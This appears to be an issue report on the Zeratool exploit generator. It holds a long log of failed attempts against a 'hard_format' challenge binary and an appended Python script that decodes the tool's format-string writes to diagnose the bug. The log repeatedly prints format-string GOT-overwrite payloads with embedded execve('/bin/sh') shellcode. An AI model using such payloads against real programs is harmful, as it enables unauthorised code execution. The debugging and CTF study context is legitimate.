I have tried the brand new pull request on the original repo, works fine for me!
But I still have some troubles when exploiting the "hard_format" binary, while the others can be exploited successfully. Although I have run this script dozens of times, it didn't work.
The log is pretty long:
(zeratool) aaa@aaa-ubuntu1604:~/Zeratool$ python zeratool.py challenges/hard_format
[+] Checking input type
[+] Checking pwn type...
[+] Checking for overflow pwn type...
[+] Checking for format string pwn type...
[+] Found symbolic buffer at position 0 of length 49
[+] Vulnerable path found %x_%
[+] Triggerable with STDIN : %x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x
[+] Getting binary protections
[+] Checking for flag leak
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[+] Returned ,*%x_%0$08x_%1$08x_%2$08x_%3$08x_%4$08x_%5$08x8x_%22$08x_%23$08x_%24$08x_%25$08x_%26$08x_%27$08x_%28$08x_%8x_%46$08x_%47$08x
t***>*><**@b*
[~] Locating buffer stack location
aaaa_0000012c_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx
aaaa_2aa615a0_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx
aaaa_00000001_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx
aaaa_61616161_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx
[+] Found stack location at 4
[+] Binary does not have NX
[+] Overwriting GOT entry to point to shellcode
Process with PID 12828 started...
= attach 12828 12828
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
glibc.fc_offset = 0x00148
Continue until 0x08048380 using 1 bpsize
hit breakpoint at: 0x8048380
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13007 started...
= attach 13007 13007
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'4\x97\x04\x086\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'4\x97\x04\x086\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13130 started...
= attach 13130 13130
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'`\x97\x04\x08b\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x97\x04\x08b\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13250 started...
= attach 13250 13250
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'L\x97\x04\x08N\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'L\x97\x04\x08N\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13370 started...
= attach 13370 13370
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'D\x97\x04\x08F\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'D\x97\x04\x08F\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13488 started...
= attach 13488 13488
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'H\x97\x04\x08J\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'H\x97\x04\x08J\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13610 started...
= attach 13610 13610
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'P\x97\x04\x08R\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'P\x97\x04\x08R\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13729 started...
= attach 13729 13729
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13791 started...
= attach 13791 13791
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13853 started...
= attach 13853 13853
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13915 started...
= attach 13915 13915
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13977 started...
= attach 13977 13977
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14039 started...
= attach 14039 14039
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Found symbolic buffer at position 0 of length 0
[-] Value at stack offset 3 not a pointer
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14103 started...
= attach 14103 14103
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14165 started...
= attach 14165 14165
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14227 started...
= attach 14227 14227
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14289 started...
= attach 14289 14289
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14352 started...
= attach 14352 14352
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14414 started...
= attach 14414 14414
File dbg:///home/kxd/Zeratool/challenges/hard_format reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
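A small diagnostic, added here and not part of Zeratool or the issue author's post, that replays printf's character counter over the logged "Format write" strings to see which 32-bit value each one would store in the GOT slot. It assumes the buffer sits at argument index 4 (the `%4$` in the log) and uses the `bin.baddr` value 0x08048000 from the log as a plausibility floor; the sample strings are copied from the log above.

```python
import re
import struct

# Constructed from the log above: each "Format write" string paired with the
# "Shellcode located at" value the tool reported for that attempt.
SAMPLES = [
    (b'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn', 0x7ffefe40),
    (b'4\x97\x04\x086\x97\x04\x08%52568c%4$hn%12959c%5$hn', 0xffffcd60),
    (b'4\x97\x04\x086\x97\x04\x08%322c%4$hn%65206c%5$hn', 0x14a),
    (b'4\x97\x04\x086\x97\x04\x08%117c%4$hn%65411c%5$hn', 0x7d),
]
BIN_BASE = 0x08048000  # bin.baddr from the log; nothing below it is mapped

# Only the two conversion kinds that appear in the log: %Nc padding, %K$hn stores.
SPEC = re.compile(rb'%(\d*)c|%(\d+)\$hn')

def decode_hn_writes(fmt: bytes, stack_offset: int = 4) -> dict:
    """Replay printf's character counter over `fmt` and return
    {address: 16-bit value} for every %hn. `stack_offset` is the argument
    index at which the buffer itself appears (the '%4$' in the log)."""
    written, pos, halves = 0, 0, {}
    for m in SPEC.finditer(fmt):
        written += m.start() - pos      # literal bytes (the addresses) count too
        pos = m.end()
        if m.group(2) is None:          # %Nc emits N characters (1 if N omitted)
            written += int(m.group(1) or 1)
        else:                           # %K$hn stores the low 16 bits of the count
            arg = int(m.group(2)) - stack_offset   # which dword of the buffer
            target = struct.unpack_from('<I', fmt, 4 * arg)[0]
            halves[target] = written & 0xffff
    return halves

def reconstruct_dword(halves: dict) -> dict:
    """Join each low half with the half stored two bytes above it."""
    return {a: lo | (halves[a + 2] << 16)
            for a, lo in halves.items() if a + 2 in halves}

def analyze(fmt: bytes) -> tuple:
    """Return (GOT slot, dword it receives, whether that dword lies above the
    binary's base). A value below BIN_BASE cannot be a stack address, so the
    earlier buffer-location step must have produced an offset, not an address."""
    (target, value), = reconstruct_dword(decode_hn_writes(fmt)).items()
    return target, value, value > BIN_BASE

if __name__ == '__main__':
    for fmt, reported in SAMPLES:
        target, value, ok = analyze(fmt)
        print(f'{target:#x} <- {value:#010x} (tool reported {reported:#x}) '
              f'{"plausible" if ok else "NOT a mapped stack address"}')
```

The arithmetic of every logged write matches the value the tool reported, so the failing attempts are the ones where "Shellcode located at" is 0x14a or 0x7d: those are far below the binary's own load address, which points at the stack-location step rather than the format-write construction.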